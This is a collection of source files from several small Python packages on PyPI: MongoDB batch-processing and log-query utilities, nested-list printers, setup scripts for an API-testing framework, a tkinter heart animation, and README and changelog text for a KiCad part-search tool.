temp_set = set()
for item in li:
temp_set_size_bf = len(temp_set)
temp_set.add(item)
temp_set_size_aft = len(temp_set)
# set size 有变化,说明该 item 不在 set 中;
if temp_set_size_aft > temp_set_size_bf:
rest.append(item)
else:
# 打印重复的那个
# print(item)
pass
return rest
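# Usage sketch (illustrative only):
#     get_sorted_un_duplicated_list([3, 1, 3, 2, 1])  # -> [3, 1, 2]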
|
zy-tools
|
/zy_tools-0.2.4.tar.gz/zy_tools-0.2.4/zy_tools/get_sorted_un_duplicated_list.py
|
get_sorted_un_duplicated_list.py
|
# !/usr/bin/env python
# _*_coding: utf-8 _*_
# @Time: 2019/6/24 11:23
# @Author: "John"
import datetime as dt
import time
from aliyun.log.getlogsrequest import GetLogsRequest
def query_log(client, query, project='java-crawler', log_store='reaper_log', query_start_time=0, query_end_time=0, line=100000):
query_result = None
while (not query_result) or (not query_result.is_completed()):
rest = GetLogsRequest(project, log_store, query_start_time, query_end_time, "", query, reverse=True, line=line)
query_result = client.get_logs(rest)
return query_result.get_body()
def query_log_new(client, query, project='java-crawler', log_store='reaper_log', target_date=dt.datetime.today(), offset=1, line=100000):
query_result = None
    # If offset > 0, query the window offset days before target_date; otherwise query forward from it
if offset > 0:
query_start_obj = target_date - dt.timedelta(days=offset)
query_end_obj = target_date - dt.timedelta(days=offset - 1)
else:
query_start_obj = target_date
query_end_obj = target_date + dt.timedelta(days=1)
    # Query start time (converted to a timestamp)
query_start = int(time.mktime(time.strptime(str(query_start_obj), '%Y-%m-%d')))
    # Query end time (converted to a timestamp)
query_end = int(time.mktime(time.strptime(str(query_end_obj), '%Y-%m-%d')))
while (not query_result) or (not query_result.is_completed()):
rest = GetLogsRequest(project, log_store, query_start, query_end, "", query, reverse=True, line=line)
query_result = client.get_logs(rest)
return query_result.get_body()
|
zy-tools
|
/zy_tools-0.2.4.tar.gz/zy_tools-0.2.4/zy_tools/aliyun_log_query.py
|
aliyun_log_query.py
|
# !/usr/bin/env python
# _*_coding: utf-8 _*_
# @Time: 2021/8/24 15:11
# @Author: "John"
import pymongo
from sshtunnel import SSHTunnelForwarder
def get_srv_and_cursor(esc_address, esc_port, esc_usr, ssh_pkey, ssh_pkey_pwd, mongo_uri, mongo_port, data_base, usr, pwd):
"""
    :param esc_address: jump host (bastion) address
    :param esc_port: jump host port
    :param esc_usr: jump host user name
    :param ssh_pkey: local path of the ssh private key (mind the drive letter / path separator)
    :param ssh_pkey_pwd:
    :param mongo_uri: MongoDB instance address
    :param mongo_port: MongoDB instance port
    :param data_base: a database the user has permissions on
    :param usr: MongoDB user name
    :param pwd: MongoDB user password
"""
server = SSHTunnelForwarder(
ssh_address_or_host=(esc_address, esc_port),
ssh_username=esc_usr,
        ssh_pkey=ssh_pkey,  # private key path
        ssh_private_key_password=ssh_pkey_pwd,  # private key password for the jump host
        remote_bind_address=(mongo_uri, mongo_port)  # database service address and port
)
    # Start the tunnel through the jump host
server.start()
conn = pymongo.MongoClient(
        host='127.0.0.1',  # host and port are fixed to the local tunnel endpoint
port=server.local_bind_port
)
db = conn[data_base]
db.authenticate(usr, pwd)
return server, conn
if __name__ == '__main__':
mongodb_address = ''
mongodb_user = ''
mongodb_pwd = ''
mongodb_authorized_database = ''
mongodb_port = 0
esc_ip_or_address = ''
esc_port_num = 0
esc_usr_name = ''
esc_pkey_pwd = ''
esc_pkey_path = ''
svr, cur = get_srv_and_cursor(esc_ip_or_address, esc_port_num, esc_usr_name,
esc_pkey_path, esc_pkey_pwd, mongodb_address,
mongodb_port, mongodb_authorized_database, mongodb_user, mongodb_pwd)
pass
|
zy-tools
|
/zy_tools-0.2.4.tar.gz/zy_tools-0.2.4/zy_tools/ssh_connection_mongo.py
|
ssh_connection_mongo.py
|
# !/usr/bin/env python
# _*_coding: utf-8 _*_
# @Time: 2019/10/17 17:52
# @Author: "John"
import time
import pymongo
import bson
import os
import shutil
import sys
import traceback
from datetime import datetime
import requests
from pymongo import MongoClient
"""
Purpose of this template:
1. The main function loops over the documents of the specified collection in the specified database and passes each queried document to core_logic for processing.
2. core_logic must be implemented by the caller of data_fix_main and must take exactly three parameters.
3. This template can be used directly via `pip install zy-tools`; there is no need to copy it from project to project.
"""
# Just pass a file name; a log file prefixed with the current script name is created in the relative path and used for logging.
def data_fix_logger(msg, fl_name='', mode="a", need_time=True, need_log=True):
if not need_log:
return
time_str = datetime.now().strftime("%Y-%m-%d %H:%M:%S")
logger_file_name = os.path.basename(sys.argv[0])[:-3] + fl_name + ".log"
with open(logger_file_name, mode) as f:
if need_time:
f.write(time_str + ' => ')
f.write(msg)
f.write("\n")
# Get the last valid _id in the file, used to resume from a checkpoint
def get_last_id(file_name):
with open(file_name, 'r') as f:
index = -1
while True:
_id = f.readlines()[index].strip()
if len(_id) == 24:
return _id
data_fix_logger(f"Get the {-index} th _id error; Current _id: {_id}")
index -= 1
def get_q_size(service):
res = requests.get(service).json()
if res and res.get('data'):
return res.get('data').get('queueSize')
def find_documents(conn, data_base, collection, query, projection, sort_key="_id", sort_value=pymongo.ASCENDING, limits=0):
    # Sort by _id ascending by default and do not limit the number of results
    _docs = conn[data_base][collection].find(query, projection).sort(sort_key, sort_value).limit(limits)
    # Put the result set into a list so it can be counted
docs = [item for item in _docs]
return docs
def core_logic_example(conn, document, is_sandbox):
"""
    Example of the core processing logic; the caller implements their own.
    [Note] It must take exactly these three parameters.
:param conn:
:param document:
:param is_sandbox:
:return:
"""
pass
def data_fix_main(uri, db, collection, more_filter, projections, core_logic, starts='', end_id='', quit_limit=0, limits=500, is_sandbox=True):
"""
    :param uri: MongoDB connection URI/credentials
    :param db: MongoDB database name
    :param collection: MongoDB collection name
    :param more_filter: query filter
    :param projections: query projection
    :param core_logic: core logic; the caller must implement a function taking exactly three parameters: the MongoDB connection object, the queried document, and is_sandbox
    :param starts: start _id; optional
    :param end_id: end _id; optional
    :param quit_limit: limit on the number of processed documents; the program exits once it is reached, useful for bounded test runs; defaults to 0 (no limit)
    :param limits: limit on documents returned per MongoDB query; defaults to 500
    :param is_sandbox: whether this is a test run; defaults to True
:return:
"""
start_id = ''
current_id = ''
exception_count = 0
has_query_count = 0
has_read_id_count = 0
conn = MongoClient(uri)
current_file_name = os.path.basename(sys.argv[0])[:-3]
    # If a checkpoint file exists, back it up first and then keep using it, so that an error cannot lose the previous checkpoint
old_logger_file = f"{current_file_name}_has_read_{collection}_ids.log"
if os.path.exists(old_logger_file):
try:
log_date = str(datetime.now().date())
log_time = str(datetime.now().time())[:-7]
bak_up_file_time = (log_date + '_' + log_time).replace('-', '_').replace(':', '_')
shutil.copy(old_logger_file, f"{current_file_name}_has_read_{collection}_ids_{bak_up_file_time}.log")
start_id = get_last_id(old_logger_file)
except Exception as e:
msg = str(e) + ",trace:" + traceback.format_exc()
data_fix_logger(f"Failed to get last id, exit! Error Msg {msg}.")
sys.exit()
    # Read the first _id from the database
if not start_id:
one_doc = conn[db][collection].find(more_filter, projection={"_id": 1}).sort("_id", pymongo.ASCENDING)
start_id = one_doc[0]["_id"]
data_fix_logger(str(start_id), fl_name=f'_has_read_{collection}_ids', mode='w', need_time=False)
query = {"_id": {"$gte": bson.ObjectId(start_id)}}
    # If a start point is passed in, use that ObjectId as the start; otherwise use the first _id queried from the database or the one read from the local file.
if starts:
query = {"_id": {"$gte": bson.ObjectId(starts)}}
if more_filter:
query.update(more_filter)
    # Exit the check after 20 caught exceptions
while exception_count < 20:
has_query_count += 1
docs = find_documents(conn, db, collection, query, projections, "_id", pymongo.ASCENDING, limits)
fl = "_query_db_counts"
log_msg = f"****** Has queried {collection}: {has_query_count}*{limits}={has_query_count * limits} documents. *******"
data_fix_logger(log_msg, fl_name=fl, mode="w")
try:
            # Empty query result: exit directly
if not docs:
data_fix_logger(f"Empty doc, exit! Last _id is: {current_id}.")
return
for doc in docs:
has_read_id_count += 1
current_id = _id = doc.get("_id")
query["_id"] = {"$gt": current_id}
data_fix_logger(str(current_id), fl_name=f'_has_read_{collection}_ids', mode='w', need_time=False)
                # If a quit limit is given, exit the program once it is reached;
                # when quit_limit is not passed, this check is skipped
if quit_limit and has_read_id_count > quit_limit:
data_fix_logger(f"Get end point, and mission is over! Last _id is: {current_id}.")
sys.exit()
                # Exit condition 2
if end_id and (current_id > end_id):
data_fix_logger(f"Get end point, and mission is over! Last _id is: {current_id}.")
                    sys.exit()  # exit the program
                # Core processing logic
core_logic(conn, doc, is_sandbox)
except Exception as e:
            query["_id"] = {"$gt": current_id}  # new query
data_fix_logger(f'Get error, exception msg is {str(e) + ",trace:" + traceback.format_exc()}, current _id is: {current_id}.')
exception_count += 1
data_fix_logger(f"Catch exception 20 times, mission is over. Last _id is: {current_id}.")
def generate_gem_ts(uri, db, collection, more_filter, projections, core_logic, start_id='', end_id='', service_address='', q_size_limit=0, limits=500, need_stream_process=False):
"""
    :param uri: MongoDB address
    :param db: MongoDB database name
    :param collection: MongoDB collection name
    :param more_filter: additional query filter
    :param projections: projection
    :param core_logic: custom core processing logic
    :param start_id: custom query start point; must be a MongoDB ObjectId
    :param end_id: custom query end point; must be a MongoDB ObjectId
    :param service_address: optional queue address used to look up the queue size
    :param q_size_limit: optional queue size; while the queue is larger than this, querying pauses
    :param limits: limit for each MongoDB query
    :param need_stream_process: whether stream processing is needed; if true, the core logic handles all records of each query at once; defaults to false, processing one record at a time
:return:
"""
query = {}
current_id = ''
exception_count = 0
has_query_count = 0
has_read_id_count = 0
if isinstance(uri, str):
conn = MongoClient(uri)
elif isinstance(uri, pymongo.mongo_client.MongoClient):
conn = uri
else:
        data_fix_logger('Invalid uri type, exiting.')
        sys.exit('Invalid uri type')
    # If a start point is passed in, use that ObjectId as the start; otherwise use the first _id queried from the database or the one read from the local file.
if start_id:
query = {"_id": {"$gte": bson.ObjectId(start_id)}}
if more_filter:
query.update(more_filter)
    # Exit the check after 20 caught exceptions
    while exception_count < 20:
        # If the queue backlog should be taken into account
        if service_address and q_size_limit:
            while 1:
                q_size = int(get_q_size(service_address))
                if q_size > q_size_limit:
                    # one round every ten minutes
                    data_fix_logger(f'queue size is greater than {q_size_limit}, sleep ten minutes, queue size: {q_size}')
                    for i in range(30):
                        time.sleep(20)
                        # query once every 20 seconds to keep the connection alive
conn.enterprise.Counters.find_one({'seq': 736564644})
else:
break
has_query_count += 1
docs = find_documents(conn, db, collection, query, projections, "_id", pymongo.ASCENDING, limits)
fl = "_query_db_counts"
log_msg = f"****** Has queried {collection} with {query}: {has_query_count}*{limits}={has_query_count * limits} documents. *******"
data_fix_logger(log_msg, fl_name=fl, mode="w")
try:
            # Empty query result: exit directly
if not docs:
data_fix_logger(f"Empty doc, exit! Last _id is: {current_id}.")
return
            # Process all docs together (stream mode)
if need_stream_process:
current_id = _id = docs[-1].get("_id")
query["_id"] = {"$gt": current_id}
                # If the process is killed before this round finishes, this prevents data loss on the next run
data_fix_logger(str(docs[0].get("_id")), fl_name=f'_has_read_{collection}_ids', mode='w', need_time=False)
core_logic(conn, docs)
                # Exit condition
if end_id:
real_end_id = None
if isinstance(end_id, str):
real_end_id = bson.ObjectId(end_id)
elif isinstance(end_id, bson.ObjectId):
real_end_id = end_id
if current_id > real_end_id:
data_fix_logger(f"Get end point, and mission is over! Last _id is: {current_id}.")
sys.exit()
continue
for doc in docs:
has_read_id_count += 1
current_id = _id = doc.get("_id")
query["_id"] = {"$gt": current_id}
data_fix_logger(str(current_id), fl_name=f'_has_read_{collection}_ids', mode='w', need_time=False)
                # Exit condition
if end_id:
real_end_id = None
if isinstance(end_id, str):
real_end_id = bson.ObjectId(end_id)
elif isinstance(end_id, bson.ObjectId):
real_end_id = end_id
if current_id > real_end_id:
data_fix_logger(f"Get end point, and mission is over! Last _id is: {current_id}.")
sys.exit()
                # Core processing logic
core_logic(conn, doc)
except Exception as e:
            query["_id"] = {"$gt": current_id}  # new query
data_fix_logger(f'Get error, exception msg is {str(e) + ",trace:" + traceback.format_exc()}, current _id is: {current_id}.')
exception_count += 1
data_fix_logger(f"Catch exception 20 times, mission is over. Last _id is: {current_id}.")
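# Usage sketch (illustrative only; the URI, database, and collection names below are placeholders):
#     def my_core_logic(conn, document, is_sandbox):
#         # inspect or fix one document here; only write when not running in sandbox mode
#         if not is_sandbox:
#             conn['mydb']['mycoll'].update_one({'_id': document['_id']}, {'$set': {'checked': True}})
#
#     data_fix_main('mongodb://localhost:27017', 'mydb', 'mycoll',
#                   more_filter={}, projections=None, core_logic=my_core_logic,
#                   limits=500, is_sandbox=True)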
|
zy-tools
|
/zy_tools-0.2.4.tar.gz/zy_tools-0.2.4/zy_tools/data_fix.py
|
data_fix.py
|
# !/usr/bin/env python
# _*_coding: utf-8 _*_
# @Time: 2020/3/27 16:30
# @Author: "John"
def read_big_file(fl, newline="{|}", fl_limit=4096):
"""
:return iterator
:param fl: file name
:param newline:
:param fl_limit:
:return:
"""
buf = ""
while True:
while newline in buf:
pos = buf.index(newline)
yield buf[:pos]
buf = buf[pos + len(newline):]
chunk = fl.read(fl_limit)
if not chunk:
            # we have reached the end of the file
yield buf
break
buf += chunk
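# Usage sketch (illustrative only; 'records.txt' is a placeholder file whose records are separated by "{|}"):
#     with open('records.txt', 'r') as fl:
#         for record in read_big_file(fl, newline="{|}"):
#             print(record)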
|
zy-tools
|
/zy_tools-0.2.4.tar.gz/zy_tools-0.2.4/zy_tools/read_file.py
|
read_file.py
|
# !/usr/bin/env python
# _*_coding: utf-8 _*_
# @Time: 2019/11/14 15:08
# @Author: "John"
import json
import uuid
import requests
import urllib3
urllib3.disable_warnings()
def sync_open_search(pid, db, collection, service_address, topic='TweOpensearch', is_sandbox=True):
"""
:param pid:
:param db:
:param collection:
:param service_address:
:param topic: default for TweOpensearch
:param is_sandbox: default for sandbox,not sync openSearch
:return:
"""
if is_sandbox:
        print(f"It is a test, not syncing openSearch: pid:{pid}.")
return
headers = {"Content-type": "application/json; charset=UTF-8", "Accept": "application/json"}
msg = {
"topic": topic,
"traceID": str(uuid.uuid1()).replace('-', ''),
"msgData": {
"mongodb": db,
"collection": collection,
"primaryKey": "PID",
"primaryValue": pid.strip(),
"isNew": 0
}
}
resp = requests.post(service_address, headers=headers, data=json.dumps(msg))
if resp.json().get("success"):
return 1
|
zy-tools
|
/zy_tools-0.2.4.tar.gz/zy_tools-0.2.4/zy_tools/sync_open_search.py
|
sync_open_search.py
|
# !/usr/bin/env python
# _*_coding: utf-8 _*_
# @Time: 2019\10\8 0008 23:44
# @Author: "John"
|
zy-tools
|
/zy_tools-0.2.4.tar.gz/zy_tools-0.2.4/zy_tools/__init__.py
|
__init__.py
|
# !/usr/bin/env python
# _*_coding: utf-8 _*_
# @Time: 2020/2/29 18:02
# @Author: "John"
import json
def beautiful_output_dict(d, encoding='utf-8', indent=4, sort_keys=True, ensure_ascii=False):
    """
    Output a Python dict (or a JSON string) in expanded, pretty-printed form
    :param d: the dict (or JSON string) to process
    :param encoding: encoding used to decode bytes input, defaults to utf-8
    :param indent: indentation width
    :param sort_keys: sort the output by the dict keys
    :param ensure_ascii:
    :return:
    """
    if isinstance(d, bytes):
        d = d.decode(encoding)
    if isinstance(d, str):
        d = json.loads(d)
    return json.dumps(d, sort_keys=sort_keys, indent=indent, ensure_ascii=ensure_ascii)
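# Usage sketch (illustrative only):
#     print(beautiful_output_dict({"b": 1, "a": {"c": 2}}))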
|
zy-tools
|
/zy_tools-0.2.4.tar.gz/zy_tools-0.2.4/zy_tools/beautiful_output_dict.py
|
beautiful_output_dict.py
|
from setuptools import setup
setup(name='zy',
version='0.1.05',
description='zy 子永的包',
author='zy-only',
author_email='ui829475@126.com',
url='https://gitee.com/only_zy/python_small_project',
install_requires=["numpy", "xlwt"],
license='zy-wkr',
packages=['zy'],
zip_safe=False)
|
zy
|
/zy-0.1.5.tar.gz/zy-0.1.5/setup.py
|
setup.py
|
from distutils.core import setup
setup(
name="zy1221_nester",
version="1.1.0",
py_modules=['zy1221_nester'],
author='zypython',
author_email='1083060476@qq.com',
url='http://www.headfirstlabs.com',
description='A simple printer of nested lists',
)
|
zy1221_nester
|
/zy1221_nester-1.1.0.zip/zy1221_nester-1.1.0/setup.py
|
setup.py
|
def print_lol(the_list,level):
for each_item in the_list:
if isinstance(each_item,list):
print_lol(each_item,level+1)
else:
for tab_stop in range(level):
print("\t",end='')
print(each_item)
|
zy1221_nester
|
/zy1221_nester-1.1.0.zip/zy1221_nester-1.1.0/zy1221_nester.py
|
zy1221_nester.py
|
from setuptools import setup,find_packages
setup(
name="zyb-message",
version="0.1",
author="zyb",
description = "张奕标,陈兴金",
packages = find_packages("zyb"),
package_dir = {"":"zyb"},
package_data = {
"":[".txt",".info","*.properties",".py"],
"":["data/*.*"],
},
exclude = ["*.test","*.test.*","test.*","test"]
)
|
zyb-message
|
/zyb-message-0.1.tar.gz/zyb-message-0.1/setup.py
|
setup.py
|
def get_info():
return "zyb_handsome_boy"
|
zyb-message
|
/zyb-message-0.1.tar.gz/zyb-message-0.1/zyb/handsome/boy/message.py
|
message.py
|
"""此模块用来输出嵌套列表,共三个参数,第一个是列表,第二个是是否缩进,第三个是缩进多少个制表符,其中后两个参数是可选的"""
def print_list(aList,is_sj=False,level=0):
"""遇到普通的元素就打印,遇到列表元素就递归调用"""
for oneElement in aList:
if isinstance(oneElement,list):
            print_list(oneElement, is_sj, level + 1)  # recurse
else:
if is_sj:
for number in range(level):
print("\t",end='')
print(oneElement)
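# Usage sketch (illustrative only):
#     print_list(["a", ["b", ["c"]]], is_sj=True)  # prints nested items, indented one tab stop per level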
|
zyb-naster
|
/zyb-naster-1.2.0.tar.gz/zyb-naster-1.2.0/print_list.py
|
print_list.py
|
from distutils.core import setup  # import the setup function
setup(
    # arguments to setup()
    name='zyb-naster',  # name of the release
    version='1.2.0',  # version
    py_modules=['print_list'],  # module metadata (module name)
    author='zyb',  # author
    author_email='yabeizhao@126.com',  # author email
    url='www.baidu.com',  # website
    description='输出列表',  # description ("print lists")
)
|
zyb-naster
|
/zyb-naster-1.2.0.tar.gz/zyb-naster-1.2.0/setup.py
|
setup.py
|
# zybats
# ZYBATS
|
zybats
|
/zybats-2.0.2.6.tar.gz/zybats-2.0.2.6/README.md
|
README.md
|
#encoding: utf-8
import io
import os
import sys
from shutil import rmtree
from setuptools import Command, find_packages, setup
about = {}
here = os.path.abspath(os.path.dirname(__file__))
with io.open(os.path.join(here, 'zybats', '__about__.py'), encoding='utf-8') as f:
exec(f.read(), about)
with io.open("README.md", encoding='utf-8') as f:
long_description = f.read()
install_requires = [
"requests",
"PyYAML",
"Jinja2",
"har2case",
"colorama",
"colorlog",
"requests_toolbelt",
"pika",
"redis==2.10.6",
"redis-py-cluster",
"xlrd",
"protobuf",
"simplejson",
"pymysql",
"PyYAML",
"Flask",
"MarkupSafe",
"certifi",
"chardet",
"idna",
"urllib3"
]
class UploadCommand(Command):
""" Build and publish this package.
Support setup.py upload. Copied from requests_html.
"""
user_options = []
@staticmethod
def status(s):
"""Prints things in green color."""
print("\033[0;32m{0}\033[0m".format(s))
def initialize_options(self):
""" override
"""
pass
def finalize_options(self):
""" override
"""
pass
def run(self):
try:
self.status('Removing previous builds…')
rmtree(os.path.join(here, 'dist'))
except OSError:
pass
self.status('Building Source and Wheel (universal) distribution…')
os.system('{0} setup.py sdist bdist_wheel --universal'.format(sys.executable))
self.status('Uploading the package to PyPi via Twine…')
os.system('twine upload dist/*')
self.status('Publishing git tags…')
os.system('git tag v{0}'.format(about['__version__']))
os.system('git push --tags')
sys.exit()
setup(
name=about['__title__'],
version=about['__version__'],
description=about['__description__'],
long_description=long_description,
long_description_content_type='text/markdown',
author=about['__author__'],
author_email=about['__author_email__'],
url=about['__url__'],
license=about['__license__'],
python_requires='>=2.7, !=3.0.*, !=3.1.*, !=3.2.*, !=3.3.*, <4',
packages=find_packages(exclude=["tests", "testsexample2", "testseg2", "tests.*"]),
package_data={
'': ["README.md"],
'zybats': ["templates/*"],
'testsexample': ["*/*"],
},
keywords='HTTP api test requests locust',
install_requires=install_requires,
extras_require={},
classifiers=[
"Development Status :: 3 - Alpha",
'Programming Language :: Python :: 2.7',
'Programming Language :: Python :: 3.4',
'Programming Language :: Python :: 3.5',
'Programming Language :: Python :: 3.6',
'Programming Language :: Python :: 3.7'
],
entry_points={
'console_scripts': [
'ate=zybats.cli:main_zats',
'zybats=zybats.cli:main_zats',
'zats=zybats.cli:main_zats',
'locusts=zybats.cli:main_locust'
]
},
# $ setup.py upload support.
cmdclass={
'upload': UploadCommand
}
)
|
zybats
|
/zybats-2.0.2.6.tar.gz/zybats-2.0.2.6/setup.py
|
setup.py
|
from zybats.ext.appext.dbUtil import Db
from zybats.ext.appext.redisUtil import RedisSingleNode
import os
URL = os.environ['url']
def get_base_url():
url = os.environ['url']
return url
def query_mysql_one_result(sql_str):
ip = "192.168.240.197"
port = 8888
user_name = "root"
password = "root"
db_name = "adx_admin"
dbClient = Db(ip, port, user_name, password, db_name)
result = dbClient.select(sql_str)
return result[0][0]
def get_redis_str_value(key):
ip = "192.168.240.98"
port = 6379
client = RedisSingleNode(ip, port)
v = client.get(key)
return v.decode()
def show_request_function(request_body, replace_app_id):
print("You can do something here! for example:")
request_body["json"]["appId"] = replace_app_id
print("Replaced request body is:", request_body)
def show_response_function(response_body, id):
print("You can do something here! for example:")
print(response_body)
if __name__ =='__main__':
aaa = "aaa"
|
zybats
|
/zybats-2.0.2.6.tar.gz/zybats-2.0.2.6/testsexample/atsfunc.py
|
atsfunc.py
|
# Installation
```python
pip install zyc_love  # just install the latest version
```
# Usage
```python
from love_code.love import run
if __name__=="__main__":
    run()
```
|
zyc-love
|
/zyc_love-1.0.1.tar.gz/zyc_love-1.0.1/README.md
|
README.md
|
from setuptools import setup, find_packages
with open('README.md','r',encoding='utf-8') as f:
long_descriptions = f.read()
setup (
name="zyc_love",
version="1.0.1",
author="renaissance",
author_email="renaissance3310@163.com",
description=" Code of Love ",
long_description = long_descriptions,
long_description_content_type="text/markdown",
url="https://github.com/renaissancezyc/zyc-love",
packages=find_packages(),
classifiers=[
"Programming Language :: Python :: 3",
"License :: OSI Approved :: Apache Software License",
"Operating System :: OS Independent",
],
)
|
zyc-love
|
/zyc_love-1.0.1.tar.gz/zyc_love-1.0.1/setup.py
|
setup.py
|
import random
from math import sin, cos, pi, log
from tkinter import *
import ctypes
user32 = ctypes.windll.user32
CANVAS_WIDTH = user32.GetSystemMetrics(0)  # canvas width
CANVAS_HEIGHT = user32.GetSystemMetrics(1)  # canvas height
CANVAS_CENTER_X = CANVAS_WIDTH / 2  # x coordinate of the canvas center
CANVAS_CENTER_Y = CANVAS_HEIGHT / 2  # y coordinate of the canvas center
IMAGE_ENLARGE = 11  # enlargement ratio
HEART_COLOR = "#ff2121"  # heart color, "Chinese red"
def heart_function(t, shrink_ratio: float = IMAGE_ENLARGE):
"""
    "Heart curve generator"
    :param shrink_ratio: enlargement ratio
    :param t: curve parameter
    :return: coordinates
"""
    # base heart curve
x = 16 * (sin(t) ** 3)
y = -(13 * cos(t) - 5 * cos(2 * t) - 2 * cos(3 * t) - cos(4 * t))
    # scale up
x *= shrink_ratio
y *= shrink_ratio
    # move to the canvas center
x += CANVAS_CENTER_X
y += CANVAS_CENTER_Y
return int(x), int(y)
def scatter_inside(x, y, beta=0.15):
"""
    Random inward scatter
    :param x: original x
    :param y: original y
    :param beta: strength
    :return: new coordinates
"""
ratio_x = - beta * log(random.random())
ratio_y = - beta * log(random.random())
dx = ratio_x * (x - CANVAS_CENTER_X)
dy = ratio_y * (y - CANVAS_CENTER_Y)
return x - dx, y - dy
def shrink(x, y, ratio):
"""
    Jitter toward the center
    :param x: original x
    :param y: original y
    :param ratio: ratio
    :return: new coordinates
"""
    force = -1 / (((x - CANVAS_CENTER_X) ** 2 + (y - CANVAS_CENTER_Y) ** 2) ** 0.6)  # magic parameter
dx = ratio * force * (x - CANVAS_CENTER_X)
dy = ratio * force * (y - CANVAS_CENTER_Y)
return x - dx, y - dy
def curve(p):
"""
    Custom curve function that adjusts the beat period
    :param p: parameter
    :return: sine value
"""
    # Other dynamic functions (Bezier?) could be tried here for a more forceful effect
return 2 * (2 * sin(4 * p)) / (2 * pi)
class Heart:
"""
    Heart animation class
"""
def __init__(self, generate_frame=20):
        self._points = set()  # set of original heart coordinates
        self._edge_diffusion_points = set()  # set of edge-diffusion points
        self._center_diffusion_points = set()  # set of center-diffusion points
        self.all_points = {}  # dynamic point coordinates for each frame
self.build(2000)
self.random_halo = 1000
self.generate_frame = generate_frame
for frame in range(generate_frame):
self.calc(frame)
def build(self, number):
        # heart outline
        for _ in range(number):
            t = random.uniform(0, 2 * pi)  # spots that are never sampled leave small gaps in the heart
x, y = heart_function(t)
self._points.add((x, y))
        # diffusion inside the heart
for _x, _y in list(self._points):
for _ in range(3):
x, y = scatter_inside(_x, _y, 0.05)
self._edge_diffusion_points.add((x, y))
        # a second round of diffusion inside the heart
point_list = list(self._points)
for _ in range(4000):
x, y = random.choice(point_list)
x, y = scatter_inside(x, y, 0.17)
self._center_diffusion_points.add((x, y))
@staticmethod
def calc_position(x, y, ratio):
        # adjust the scaling ratio
        force = 1 / (((x - CANVAS_CENTER_X) ** 2 + (y - CANVAS_CENTER_Y) ** 2) ** 0.520)  # magic parameter
dx = ratio * force * (x - CANVAS_CENTER_X) + random.randint(-1, 1)
dy = ratio * force * (y - CANVAS_CENTER_Y) + random.randint(-1, 1)
return x - dx, y - dy
def calc(self, generate_frame):
        ratio = 10 * curve(generate_frame / 10 * pi)  # smooth periodic scaling ratio
halo_radius = int(4 + 6 * (1 + curve(generate_frame / 10 * pi)))
halo_number = int(3000 + 4000 * abs(curve(generate_frame / 10 * pi) ** 2))
all_points = []
        # halo
        heart_halo_point = set()  # set of halo point coordinates
for _ in range(halo_number):
            t = random.uniform(0, 2 * pi)  # spots that are never sampled leave small gaps in the heart
            x, y = heart_function(t, shrink_ratio=11.6)  # magic parameter
x, y = shrink(x, y, halo_radius)
if (x, y) not in heart_halo_point:
                # handle a new point
heart_halo_point.add((x, y))
x += random.randint(-14, 14)
y += random.randint(-14, 14)
size = random.choice((1, 2, 2))
all_points.append((x, y, size))
        # outline
for x, y in self._points:
x, y = self.calc_position(x, y, ratio)
size = random.randint(1, 3)
all_points.append((x, y, size))
        # interior
for x, y in self._edge_diffusion_points:
x, y = self.calc_position(x, y, ratio)
size = random.randint(1, 2)
all_points.append((x, y, size))
for x, y in self._center_diffusion_points:
x, y = self.calc_position(x, y, ratio)
size = random.randint(1, 2)
all_points.append((x, y, size))
self.all_points[generate_frame] = all_points
def render(self, render_canvas, render_frame):
for x, y, size in self.all_points[render_frame % self.generate_frame]:
render_canvas.create_rectangle(x, y, x + size, y + size, width=0, fill=HEART_COLOR)
def draw(main: Tk, render_canvas: Canvas, render_heart: Heart, render_frame=0):
render_canvas.delete('all')
render_heart.render(render_canvas, render_frame)
main.after(160, draw, main, render_canvas, render_heart, render_frame + 1)
def run():
    root = Tk()  # a Tk root window
    root.attributes('-fullscreen', True)  # full screen
    root.attributes('-alpha', 0.9)  # transparency
canvas = Canvas(root , bg='black' , height=CANVAS_HEIGHT , width=CANVAS_WIDTH)
canvas.pack()
    heart = Heart()  # the heart
    draw(root, canvas, heart)  # start drawing~
root.mainloop()
|
zyc-love
|
/zyc_love-1.0.1.tar.gz/zyc_love-1.0.1/love_code/love.py
|
love.py
|
print('这里是周奕呈编写的爱心代码')
|
zyc-love
|
/zyc_love-1.0.1.tar.gz/zyc_love-1.0.1/love_code/__init__.py
|
__init__.py
|
=======
History
=======
1.0.0 (2021-09-16)
------------------
* Disabled creation of SKiDL logging and ERC files.
* Decided this tool was mature to the point it could be called 1.0.0.
0.4.0 (2020-09-20)
------------------
* Fixed infinite recursion caused by search that returns an entire list of invalid footprints (issue #2).
0.3.0 (2020-06-07)
------------------
* Fixed copy-paste part/footprint errors caused by clipboard already being open.
0.2.0 (2020-04-28)
------------------
* Replaced sorting function deleted from SKiDL.
* Updated some Grid definitions for wxpython 4.0.
0.1.0 (2019-12-17)
------------------
* Extracted zyc utility from SKiDL repo and released separately on PyPi.
|
zyc
|
/zyc-1.0.0.tar.gz/zyc-1.0.0/HISTORY.rst
|
HISTORY.rst
|
===
zyc
===
.. image:: https://img.shields.io/pypi/v/zyc.svg
:target: https://pypi.python.org/pypi/zyc
A GUI utility for searching and selecting parts and footprints for use with `SKiDL <https://pypi.org/project/skidl/>`_.
* Free software: MIT license
* Documentation: https://devbisme.github.io/zyc .
Features
--------
* Keyword search and selection of parts in KiCad libraries.
* Keyword search and selection of footprints in KiCad libraries.
* Copy-and-paste part instances into SKiDL code.
Credits
-------
This package was created with Cookiecutter_ and the `audreyr/cookiecutter-pypackage`_ project template.
.. _Cookiecutter: https://github.com/audreyr/cookiecutter
.. _`audreyr/cookiecutter-pypackage`: https://github.com/audreyr/cookiecutter-pypackage
|
zyc
|
/zyc-1.0.0.tar.gz/zyc-1.0.0/README.rst
|
README.rst
|
.. highlight:: shell
============
Contributing
============
Contributions are welcome, and they are greatly appreciated! Every little bit
helps, and credit will always be given.
You can contribute in many ways:
Types of Contributions
----------------------
Report Bugs
~~~~~~~~~~~
Report bugs at https://github.com/devbisme/zyc/issues.
If you are reporting a bug, please include:
* Your operating system name and version.
* Any details about your local setup that might be helpful in troubleshooting.
* Detailed steps to reproduce the bug.
Fix Bugs
~~~~~~~~
Look through the GitHub issues for bugs. Anything tagged with "bug" and "help
wanted" is open to whoever wants to implement it.
Implement Features
~~~~~~~~~~~~~~~~~~
Look through the GitHub issues for features. Anything tagged with "enhancement"
and "help wanted" is open to whoever wants to implement it.
Write Documentation
~~~~~~~~~~~~~~~~~~~
zyc could always use more documentation, whether as part of the
official zyc docs, in docstrings, or even on the web in blog posts,
